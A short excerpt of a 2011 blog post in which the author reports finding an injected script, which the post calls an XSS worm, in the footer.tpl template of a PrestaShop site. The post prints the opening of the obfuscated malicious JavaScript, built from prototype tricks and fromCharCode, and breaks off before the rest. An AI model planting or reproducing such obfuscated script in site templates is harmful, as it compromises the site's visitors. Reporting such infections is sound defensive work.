HOW GEEK!

geek notes for advice seekers

August, 2011

Prestashop XSS Worm (footer.tpl virus)

Today i woke up and connected to a Prestashop site i’m setting up. I didn’t install anything extra on it (only my custom template), also it wasn’t in search engines. I noticed a strange blank line in the footer.. DOH! When i looked, i had this code in the footer: <script>String.prototype.asd=function(){return String.fromCharCode;}; Object.prototype.asd=”e”;try{for(i in{})if(~i.indexOf(‘as’))throw 1;} […]

, , , , ,